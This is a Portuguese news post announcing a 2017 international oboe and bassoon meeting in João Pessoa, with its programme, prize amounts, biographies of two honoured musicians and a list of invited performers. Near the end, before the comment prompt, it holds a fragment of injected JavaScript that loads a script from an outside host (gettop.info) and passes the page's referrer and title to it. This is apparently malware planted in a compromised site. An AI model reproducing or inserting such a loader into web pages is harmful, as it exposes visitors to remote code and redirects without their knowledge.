Escrito por em 11 set 2017 nas áreas Curso / Encontro, Paraíba, Programação

Mais de 30 instrumentistas, nacionais e internacionais, confirmaram presença em encontro internacional promovido pela Associação Brasileira de Palhetas Duplas.

 

De 28 de setembro a 1 de outubro, João Pessoa será palco do 1º Encontro Internacional da Associação de Palhetas Duplas e do 2º Encontro Nordestino de Palhetas Duplas, que trazem à capital paraibana renomados instrumentistas, oboístas e fagotista, nacionais e internacionais. O evento, promovido pela Associação Brasileira de Palhetas Duplas (ABPD) com a Universidade Federal da Paraíba (UFPB), ocorre na Fundação Espaço Cultural (Funesc) e tem uma variada programação, com atividades voltadas para o intercâmbio e a disseminação do conhecimento artístico-musical.

Integram a programação 18 masterclasses, oficinas de palhetas e lutheria para oboé e fagote, conferências, palestras e concertos. Além da realização do 1º Concurso Nacional de Palhetas Duplas da ABPD, que irá premiar o melhor oboísta e fagotista com o valor de R$ 1.500,00 (hum mil e quinhentos reais), a segunda colocação com R$ 600,00 (seiscentos reais) e o terceiro lugar com R$ 400,00 (quatrocentos reais). Haverá ainda premiação para a melhor interpretação de obra comissionada, que será de 300,00 (trezentos reais).

Os vencedores receberão ainda isenção da anuidade da ABPD em 2018 e da taxa de inscrição para o 2º Encontro Internacional da Associação Brasileira de Palhetas Duplas (2018), do qual também participarão do concerto de abertura. E poderão atuar como solistas na temporada 2018 de sete orquestras brasileiras.

O evento tem como público alvo alunos e profissionais da música que tocam oboé e fagote, porém é aberto ao público em geral, especialmente, na programação de concertos e palestras. O encontro homenageia o oboísta Wascyli Simões e o fagotista Hary Schweizer, dois grandes músicos que contribuíram para o desenvolvimento dos instrumentos de palhetas duplas no Brasil. Está confirmada ainda a presença dos pianistas Daniel Seixas, Lucas Bojikian, Glauco Tássio, Hammurábi Ferreira e José Andrade.

 

ABPD

A Associação Brasileira de Palhetas Duplas (ABPD) foi criada durante o 1º Encontro Nordestino de Palhetas Duplas, realizado em novembro de 2016, na Universidade Federal da Paraíba, no qual foi eleita e empossada a primeira diretoria da associação, composta por oboístas e fagotistas do Brasil inteiro. A ABPD tem por objetivo promover diversas ações de integração e intercâmbio entre alunos e profissionais de palhetas duplas, além de realizar anualmente um encontro.

 

Homenageados

Wascyli Simões dos Anjos

Wascyli Simões dos Anjos nasceu em Recife (PE), em 6 de outubro de 1928. Aos 11 anos, ingressou na Escola Industrial do Recife, na qual teve seus primeiros contatos com a música por meio da banda musical da escola. Passados quatro anos de estudo na clarineta, resolveu dedicar-se ao oboé, por incentivo do maestro Vicente Fittipaldi, fundador e então regente titular da Orquestra Sinfônica do Recife (OSR). Aos 15 anos, ingressou na OSR como estagiário e, aos, 18 foi contratado como 2º oboísta, tendo sido, com pouco tempo depois, alçado ao cargo de oboísta solista. Completou sua formação musical no Conservatório Pernambucano de Música, em que teve aulas de solfejo e teoria musical, além de masterclasses ministradas por oboístas de referências nacional e internacional, que eventualmente passavam por Recife, embora o autodidatismo tenha sido elemento predominante em sua formação. Como profissional, participou da criação de vários grupos musicais importantes, entre os quais a Orquestra Sinfônica da Rádio Jornal do Commercio e da Orquestra Armorial, juntamente com músicos como Cussy de Almeida e Clóvis Pereira. Fundou também o primeiro Quinteto de Sopros da cidade do Recife. Nos anos 1970, foi professor da UFPE, lecionando aulas de oboé, clarineta, flauta transversa e flauta-doce. Além da UFPE, foi contratado também pela UFRN e UFPB, passando, de forma desbravada e incansável, a atuar nos três estados, simultaneamente. Participou da fundação da então Orquestra de Câmara da Paraíba (hoje OSPB) e da Orquestra Sinfônica do RN, além de ter criado o Quinteto de Sopros da UFRN. Em 1977, formou o Duo Oboé/Piano com o pianista Gerardo Parente e, representando o Brasil, seguindo para os EUA, onde se apresentaram em várias em cidades importantes, divulgando a música brasileira. Faleceu em 2016.

 

Hary Schweizer

Apesar do nome nada familiar, Hary Schweizer é brasileiro, natural da cidade catarinense de Mafra. Com estudos de música em Curitiba e em Munique, na Alemanha, entrou para a Universidade de Brasília (UnB) em 1977 como professor de fagote, com atuação também em música de câmara e história da música. Na área de música de câmara (quinteto de sopros, trio de palhetas, recitais com piano e outras combinações) coordenou e participou ativamente da série Concerto Semanal da UnB, resultando deste trabalho algumas gravações (Marlos Nobre, Cláudio Santoro, Emílio Terraza). É músico fundador da Orquestra Sinfônica do Teatro Nacional Cláudio Santoro, na qual até hoje é seu primeiro fagotista; com esta mesma orquestra e sob a batuta de diversos regentes apresentou os principais concertos para fagote e orquestra (Mozart, Weber, Villa-Lobos, Vivaldi, Françaix). A partir de uma carência nacional de instrumentos se aventurou numa área que lhe era desconhecida, a de construtor de fagotes, tendo a partir de então conseguido conquistas significativas, reconhecidas também pela imprensa especializada internacional. Na área específica do fagote vê com orgulho o fruto de seu trabalho: seus fagotes e seus alunos, hoje atuantes como músicos em orquestras e professores de fagote, tanto no Brasil como no exterior. Documentou no CD, que recebeu o nome de Com licença!… – Aspectos de sua atividade profissional como intérprete, professor e construtor de fagotes.

 

Músicos convidados confirmados

Afonso Venturieri (fagote principal da Orquestra de la Suisse Romande em Geneva e professor da Orquestra Juvenil das Américas)
Alberto Grossi (oboísta e luthier com passagem por várias orquestras e atualmente é proprietário de dono do atelier para consertos de instrumentos)
Alexandre Barros (principal oboísta da orquestra Filarmônica de Minas Gerais e professor do Centro de Formação Artística da Fundação Clóvis Salgado)
Alexandre dos Santos (professor de fagote e história da música Universidade Federal do Rio Grande do Norte)
Alexandre Silvério (fagotista principal da Osesp e professor da Escola Municipal de Música de São Paulo)
Aloysio Fagerlande (professor de fagote da Escola de Música da Universidade Federal do Rio de Janeiro)
Arcádio Minczuck (professor de oboé e música de câmara no Instituto de Artes da Universidade Estadual Paulista e na Academia da Osesp, além de oboísta da Osesp)
Artur Ortenblad (professor de oboé na Universidade Federal de Pernambuco)
Benjamim Coelho (professor titular na University of Iowa e fagote solista da Quad City Symphony Orchestra)
Catherine Carignan (fagote principal da Orquestra Filarmônica de Minas Gerais)
Courtney Miller (professora assistente de oboé na Universidade de Iowa e corne inglês na Quad City Symphony Orchestra)
Elione Medeiros (professor de fagote e música de câmera da UniRio e fagotista barroco da Orquestra Barroca da UniRio)
Fábio Cury (solista das principais orquestras brasileiras, tais como: Osesp, OSB, Filarmônica de Minas Gerais e Orquestra Municipal de São Paulo)
Federico Curti (solista adjunto da Orquestra Filarmônica de Montevideo e da Orquestra Sinfónica del Sodre)
Fernando Gualda (professor de oboé e música de câmara na Universidade Federal do Rio Grande do Sul)
Francisco Formiga (fagotista da Osesp e professor da Academia de Música da Osesp)
Hugo Souza (oboísta e doutorando na Eastman School of Music em Rochester – Nova York)
Isaac Duarte (co-solista de primeiro oboé e corne inglês da Orquestra da Tonhalle de Zurique)
José Medeiros (oboé principal da Orquestra Sinfônica do Teatro Nacional Cláudio Santoro-DF e professor do Programa de Módulos do bacharelado em Música da Universidade Estadual do Pará)
Keith Sweger (professor de fagote na Ball State University e fagote principal da Orquestra Sinfônica de Muncie)
Leonardo Fuks (professor da Escola de Música da Universidade Federal do Rio de Janeiro e consultor em exposições e em filmes didáticos)
Lucius Mota (professor de oboé na Universidade Federal de Santa Maria)
Mauro Avila (fagotista da Orquestra Sinfônica Brasileira e da Orquestra Sinfônica da Universidade Federal do Rio de Janeiro)
Michaela Hrabankova (professora na Gheorge Dima Music Academy in Cluj-Napoca, na România, e da Academy of Perfoming Arts, em Praga)
Paulo Porto (professor titular de fagote e música de câmara da Escola de Música da Universidade Federal)
Priscila Leiko Fuzikawa (terapeuta ocupacional com atendimento a músicos em aprimoramento de performance)
Raquel Carneiro (professora de fagote na Escola de Música da Universidade Federal de Minas Gerais e fagotista na Orquestra Sinfônica de Minas Gerais)
Ravi Shankar (professor de oboé da Universidade Federal da Paraíba)
Ricardo Barbosa (oboísta da Osesp e professor de oboé e repertório contemporâneo na Escola de Música do Estado de São Paulo)
Rio Mönnig Fagotti (grupo de fagotistas atuantes no Rio de Janeiro)
Roberta Benjamim (primeira oboísta da Orquestra Sinfônica do Rio Grande do Norte)
Romeu Rabelo (fagotista e contrafagotista da Osesp)
Sarah Roper (solista de oboé na Real Orquestra Sinfônica de Sevilha e segunda vice-presidente da International Double Reed Societ)
Valdir Caires (professor de fagote da Universidade Federal de Pernambuco)

 

Outras informações na página do evento.

 

Foto do post: Roger H. Sassaki

 

SERVIÇO:

 

1º Encontro Internacional da Associação Brasileira de Palhetas Duplas

 

De 28 de setembro a 1 de outubro

Fundação Espaço Cultural | Funesc (R. Abdias Gomes de Almeida, 800, Tambauzinho – João Pessoa. Tels.: 83 3211 6225 e 3211 6201)

 

Entrada gratuita

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;d.getElementsByTagName(‘head’)[0].appendChild(s);

Faça seu comentário